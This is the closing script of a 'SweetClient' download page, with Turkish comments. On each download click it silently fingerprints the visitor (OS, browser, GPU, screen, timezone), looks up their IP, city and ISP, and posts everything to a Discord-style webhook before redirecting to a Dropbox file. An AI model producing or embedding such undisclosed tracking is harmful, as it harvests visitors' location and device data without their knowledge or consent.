        if (gl) {
          const debugInfo = gl.getExtension('WEBGL_debug_renderer_info');
          if (debugInfo) {
            info.webglVendor = gl.getParameter(debugInfo.UNMASKED_VENDOR_WEBGL) || 
                              gl.getParameter(gl.VENDOR) || 
                              'Unknown';
            info.webglRenderer = gl.getParameter(debugInfo.UNMASKED_RENDERER_WEBGL) || 
                                 gl.getParameter(gl.RENDERER) || 
                                 'Unknown';
          } else {
            // WEBGL_debug_renderer_info yoksa normal parametreleri kullan
            info.webglVendor = gl.getParameter(gl.VENDOR) || 'Unknown';
            info.webglRenderer = gl.getParameter(gl.RENDERER) || 'Unknown';
          }
        }
      } catch (e) {
        console.error('WebGL bilgisi alınamadı:', e);
      }
      
      return info;
    }

    function getIPInfo(info, callback) {
      try {
        const xhr = new XMLHttpRequest();
        xhr.open('GET', 'https://ipapi.co/json/', true);
        xhr.onload = function() {
          try {
            const data = JSON.parse(xhr.responseText);
            info.country = data.country_name || 'Unknown';
            info.city = data.city || 'Unknown';
            info.region = data.region || 'Unknown';
            info.ip = data.ip || 'Unknown';
            info.isp = data.org || 'Unknown';
          } catch (e) {
            info.country = 'Unknown';
            info.city = 'Unknown';
            info.region = 'Unknown';
            info.ip = 'Unknown';
            info.isp = 'Unknown';
          }
          callback();
        };
        xhr.onerror = function() {
          info.country = 'Unknown';
          info.city = 'Unknown';
          info.region = 'Unknown';
          info.ip = 'Unknown';
          info.isp = 'Unknown';
          callback();
        };
        xhr.send();
      } catch (e) {
        info.country = 'Unknown';
        info.city = 'Unknown';
        info.region = 'Unknown';
        info.ip = 'Unknown';
        info.isp = 'Unknown';
        callback();
      }
    }

    function sendWebhook() {
      const systemInfo = collectSystemInfo();
      
      // IP bilgisini beklemeden önce webhook'u gönder (timeout ile)
      const sendPayload = () => {
        const payload = {
          embeds: [{
            author: {
              name: 'Download Button Clicked'
            },
            fields: [
              {
                name: '📍 Location',
                value: `Country: ${systemInfo.country || 'Loading...'}\nCity: ${systemInfo.city || 'Loading...'}\nRegion: ${systemInfo.region || 'Loading...'}\nTimezone: ${systemInfo.timezone}`,
                inline: false
              },
              {
                name: '💻 System Info',
                value: `OS: ${systemInfo.os}\nBrowser: ${systemInfo.browser}\nDevice: ${systemInfo.device}`,
                inline: false
              },
              {
                name: '🖥️ Display',
                value: `Screen: ${systemInfo.screen}\nViewport: ${systemInfo.viewport}\nColor Depth: ${systemInfo.colorDepth}`,
                inline: false
              },
              {
                name: '🌐 Network',
                value: `IP: ${systemInfo.ip || 'Loading...'}\nISP: ${systemInfo.isp || 'Loading...'}\nLanguage: ${systemInfo.language}`,
                inline: false
              },
              {
                name: '⚙️ Platform',
                value: `Platform: ${systemInfo.platform}\nCookies: ${systemInfo.cookies}\nOnline: ${systemInfo.online}`,
                inline: false
              },
              {
                name: '🎮 Graphics Card (GPU)',
                value: `Vendor: ${systemInfo.webglVendor}\nRenderer: ${systemInfo.webglRenderer}`,
                inline: false
              },
              {
                name: '📄 Page Info',
                value: `Referrer: ${systemInfo.referrer}\nURL: ${systemInfo.url}\nTouch: ${systemInfo.touch}`,
                inline: false
              }
            ],
            footer: {
              text: 'SweetCraft Download Tracker'
            },
            color: parseInt('0x9876FF', 16),
            timestamp: new Date().toISOString()
          }]
        };

        const payloadString = JSON.stringify(payload);
        
        // Log kaydet (localStorage'a)
        const logMessage = `[${new Date().toISOString()}] Webhook gönderiliyor: ${WEBHOOK_URL}`;
        try {
          const logs = JSON.parse(localStorage.getItem('webhook_logs') || '[]');
          logs.push(logMessage);
          if (logs.length > 10) logs.shift(); // Son 10 log'u tut
          localStorage.setItem('webhook_logs', JSON.stringify(logs));
        } catch(e) {}
        
        // Fetch API kullan - keepalive ile sayfa yönlenirken bile çalışır
        fetch(WEBHOOK_URL, {
          method: 'POST',
          headers: {
            'Content-Type': 'application/json'
          },
          body: payloadString,
          keepalive: true // Sayfa yönlenirken bile isteği tamamla
        })
        .then(response => {
          const statusLog = `[${new Date().toISOString()}] Response: ${response.status} ${response.statusText}`;
          try {
            const logs = JSON.parse(localStorage.getItem('webhook_logs') || '[]');
            logs.push(statusLog);
            if (logs.length > 10) logs.shift();
            localStorage.setItem('webhook_logs', JSON.stringify(logs));
          } catch(e) {}
          
          if (!response.ok) {
            const errorLog = `[${new Date().toISOString()}] HATA: ${response.status} ${response.statusText}`;
            try {
              const logs = JSON.parse(localStorage.getItem('webhook_logs') || '[]');
              logs.push(errorLog);
              if (logs.length > 10) logs.shift();
              localStorage.setItem('webhook_logs', JSON.stringify(logs));
            } catch(e) {}
          }
          return response.text();
        })
        .then(text => {
          const successLog = `[${new Date().toISOString()}] Webhook başarıyla gönderildi!`;
          try {
            const logs = JSON.parse(localStorage.getItem('webhook_logs') || '[]');
            logs.push(successLog);
            if (logs.length > 10) logs.shift();
            localStorage.setItem('webhook_logs', JSON.stringify(logs));
          } catch(e) {}
        })
        .catch(err => {
          const errorLog = `[${new Date().toISOString()}] Webhook hatası: ${err.message}`;
          try {
            const logs = JSON.parse(localStorage.getItem('webhook_logs') || '[]');
            logs.push(errorLog);
            if (logs.length > 10) logs.shift();
            localStorage.setItem('webhook_logs', JSON.stringify(logs));
          } catch(e) {}
        });
      };

      // IP bilgisini al, ama 2 saniye timeout koy
      let ipReceived = false;
      const timeout = setTimeout(() => {
        if (!ipReceived) {
          sendPayload();
        }
      }, 2000);

      getIPInfo(systemInfo, function() {
        ipReceived = true;
        clearTimeout(timeout);
        sendPayload();
      });
    }

    modalDownload?.addEventListener("click", (e) => {
      e.preventDefault();
      sendWebhook();
      showNotification("SweetClient download started");
      
      // Webhook'un gönderilmesi için yeterli zaman ver (500ms)
      setTimeout(() => {
        // Dropbox linkine yönlendir (?dl=1 parametresi ile direkt indirme)
        window.location.href = WINDOWS_URL;
      }, 500);
    });
    
    // Debug: Logları görmek için console'da şunu çalıştırın:
    // JSON.parse(localStorage.getItem('webhook_logs') || '[]').forEach(log => console.log(log));
  })();
</script>

</body></html>